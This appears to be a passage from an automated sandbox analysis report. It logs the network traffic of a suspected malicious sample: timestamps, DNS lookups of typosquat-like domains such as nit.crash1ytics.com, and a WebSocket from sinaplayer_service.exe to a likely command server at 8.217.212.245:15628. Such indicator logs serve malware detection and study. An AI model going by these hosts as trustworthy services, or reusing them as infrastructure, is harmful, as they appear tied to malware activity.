                                                                                                                                                                                                  Dec 29, 2024 16:31:21.802642107 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:21.804254055 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:21.804264069 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:21.804418087 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:21.804476976 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:22.224369049 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:22.224390030 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:22.273721933 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:31:22.394515991 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:23.445960999 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:23.445991993 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:25.716588974 CET50000443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:25.716629028 CET4435000035.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:27.494261980 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:27.494283915 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:27.794754982 CET50004443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:27.794776917 CET4435000435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:29.726706028 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:29.726749897 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:30.044264078 CET50008443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:30.044281006 CET443500088.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:31.989959002 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:31.989978075 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:32.356915951 CET50014443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:32.356935978 CET443500148.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:34.448429108 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:34.448451042 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:34.542401075 CET50020443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:34.542424917 CET443500208.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:34.954443932 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:34.954469919 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:36.416754961 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:36.416775942 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:36.812836885 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:36.812863111 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:37.224021912 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:37.224045992 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:38.458664894 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:38.458688974 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:40.728405952 CET50000443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:40.728451967 CET4435000035.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:42.494545937 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:42.494570971 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:42.797133923 CET50004443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:42.797152996 CET4435000435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:44.736660957 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:44.736690998 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:45.052669048 CET50008443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:45.052685976 CET443500088.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:47.000726938 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:47.000755072 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:47.368545055 CET50014443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:47.368575096 CET443500148.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.461129904 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.461148024 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.557102919 CET50020443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.557116985 CET443500208.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.957084894 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:49.957103968 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.424592972 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.424612999 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.824140072 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:51.824152946 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.224112034 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.224144936 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.831458092 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:31:52.952248096 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:53.471101046 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:53.471131086 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:55.738656044 CET50000443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:55.738706112 CET4435000035.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.494088888 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.494132996 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.797127008 CET50004443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:57.797154903 CET4435000435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:31:59.744635105 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:59.744658947 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:00.062654018 CET50008443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:00.062666893 CET443500088.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.009656906 CET49976443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.009677887 CET44349976183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.371704102 CET50014443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:02.371727943 CET443500148.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.130717039 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.251858950 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.465652943 CET49982443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.465671062 CET44349982183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.560235977 CET50020443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.560251951 CET443500208.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.960649967 CET49946443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:32:04.960680008 CET4434994623.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.427659035 CET49988443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.427679062 CET4434998835.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.826658964 CET50022443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:06.826678991 CET443500228.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:07.225675106 CET49952443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:32:07.225708008 CET4434995223.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:08.485672951 CET49994443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:08.485712051 CET4434999435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:10.739265919 CET50000443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:10.739289999 CET4435000035.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.507688046 CET49958443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.507726908 CET44349958183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.811714888 CET50004443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:32:12.811752081 CET4435000435.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:14.744698048 CET49970443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:32:14.744724035 CET44349970183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:32:15.064779043 CET50008443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:32:15.064798117 CET443500088.223.56.120192.168.2.5

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.009149075 CET5675553192.168.2.51.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.369443893 CET53567551.1.1.1192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.396998882 CET5653553192.168.2.51.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.103224039 CET5098753192.168.2.51.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.103650093 CET6352653192.168.2.51.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.104707956 CET6230153192.168.2.51.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.243352890 CET53509871.1.1.1192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.244573116 CET53623011.1.1.1192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET53635261.1.1.1192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.688141108 CET6230353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.690073967 CET5471553192.168.2.51.1.1.1
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.696779966 CET5471653192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.701271057 CET5471753192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.752866983 CET54718443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET53547151.1.1.1192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET53547168.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET53547178.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET53623038.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085525036 CET54719443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.370963097 CET56745443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.696604967 CET56746443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.723303080 CET56747443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:30:33.958347082 CET56748443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:36.274549961 CET56749443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:38.490108013 CET56750443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:40.763509989 CET56751443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:43.099176884 CET56752443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:45.387247086 CET56753443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:47.602293968 CET56754443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:49.941349030 CET56755443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:52.197984934 CET56756443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:57.475061893 CET56757443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:59.718918085 CET56758443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:01.974857092 CET56759443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:31:04.437268972 CET56760443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:06.411166906 CET56761443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:08.435096025 CET56762443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:10.702465057 CET56763443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:31:12.783324957 CET56764443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:15.033483028 CET56765443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:17.346807003 CET56766443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:31:19.537801981 CET56767443192.168.2.58.223.56.120

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.009149075 CET192.168.2.51.1.1.10xc2e6Standard query (0)ws-ap1.pusher.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.396998882 CET192.168.2.51.1.1.10xb8e8Standard query (0)in.appcenter.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.103224039 CET192.168.2.51.1.1.10x2e83Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.103650093 CET192.168.2.51.1.1.10x61cdStandard query (0)www.yandex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.104707956 CET192.168.2.51.1.1.10xf5ddStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.688141108 CET192.168.2.58.8.8.80x2a67Standard query (0)nal.fqoqehwib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.690073967 CET192.168.2.51.1.1.10xc7eaStandard query (0)d1dmgcawtbm6l9.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.696779966 CET192.168.2.58.8.8.80x8fbeStandard query (0)chr.alipayassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.701271057 CET192.168.2.58.8.8.80x7edStandard query (0)nit.crash1ytics.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.369443893 CET1.1.1.1192.168.2.50xc2e6No error (0)ws-ap1.pusher.comsocket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.369443893 CET1.1.1.1192.168.2.50xc2e6No error (0)socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com18.136.139.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.369443893 CET1.1.1.1192.168.2.50xc2e6No error (0)socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com18.136.85.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.369443893 CET1.1.1.1192.168.2.50xc2e6No error (0)socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com13.228.227.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.536847115 CET1.1.1.1192.168.2.50xb8e8No error (0)in.appcenter.msin-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.243352890 CET1.1.1.1192.168.2.50x2e83No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.243352890 CET1.1.1.1192.168.2.50x2e83No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.243352890 CET1.1.1.1192.168.2.50x2e83No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.243352890 CET1.1.1.1192.168.2.50x2e83No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.244573116 CET1.1.1.1192.168.2.50xf5ddNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)www.yandex.comyandex.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)yandex.com77.88.55.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)yandex.com77.88.44.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.443376064 CET1.1.1.1192.168.2.50x61cdNo error (0)yandex.com5.255.255.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.936062098 CET1.1.1.1192.168.2.50xc7eaNo error (0)d1dmgcawtbm6l9.cloudfront.net13.227.9.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com222.91.58.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com12.206.118.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com129.180.217.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.075109005 CET8.8.8.8192.168.2.50x8fbeNo error (0)chr.alipayassets.com85.222.79.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com223.61.70.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com142.242.204.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com4.159.142.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com19.88.16.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com124.119.121.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.082664013 CET8.8.8.8192.168.2.50x7edNo error (0)nit.crash1ytics.com67.137.174.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com10.176.38.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com200.200.101.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com33.86.72.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com191.244.156.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com104.112.172.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com6.114.13.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Dec 29, 2024 16:30:23.235286951 CET8.8.8.8192.168.2.50x2a67No error (0)nal.fqoqehwib.com82.150.106.47A (IP address)IN (0x0001)false

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  • 8.217.212.245:15628
                                                                                                                                                                                                  • ws-ap1.pusher.com

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.5497258.217.212.245156287936C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:29:17.262418985 CET230OUTGET /\ HTTP/1.1
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Key: EHoDnRGHRnGJKgiBCKlZTSJBa
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                  Host: 8.217.212.245:15628
                                                                                                                                                                                                  Dec 29, 2024 16:29:18.888113976 CET148INHTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Upgrade: WebSocket
                                                                                                                                                                                                  Sec-WebSocket-Accept: l1EGrYNHe0x2G7V+JaejrBHDn1g=
                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.54986518.136.139.158802448C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.573679924 CET265OUTGET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1
                                                                                                                                                                                                  Host: ws-ap1.pusher.com
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Connection: Upgrade
                                                                                                                                                                                                  Sec-WebSocket-Version: 13
                                                                                                                                                                                                  Sec-WebSocket-Key: YTViMmFmNmQtNjcxNi00Ng==
                                                                                                                                                                                                  Origin: ws://ws-ap1.pusher.com
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.080887079 CET166INHTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:30:20 GMT
                                                                                                                                                                                                  Connection: upgrade
                                                                                                                                                                                                  Upgrade: websocket
                                                                                                                                                                                                  Sec-WebSocket-Accept: 2VjydNfP306k+jnvn4S56zrWENY=
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.935425043 CET242INData Raw: 81 7e 00 92 7b 22 65 76 65 6e 74 22 3a 22 70 75 73 68 65 72 3a 65 72 72 6f 72 22 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 34 30 30 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 70 70 20 6b 65 79 20 34 66 63 34 33 36 65 66 33 36 66 34 30 32 36
                                                                                                                                                                                                  Data Ascii: ~{"event":"pusher:error","data":{"code":4001,"message":"App key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?"}}ZApp key 4fc436ef36f4026102d7 not in this cluster. Did you forget to specify the cluster?
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.007287025 CET8OUTData Raw: 88 82 f5 b0 6a 5c f6 58
                                                                                                                                                                                                  Data Ascii: j\X


                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.54987913.227.9.1594432448C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-12-29 15:30:24 UTC182OUTGET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=5
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 3df0c7f0100d83e321104aebfb371f70.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
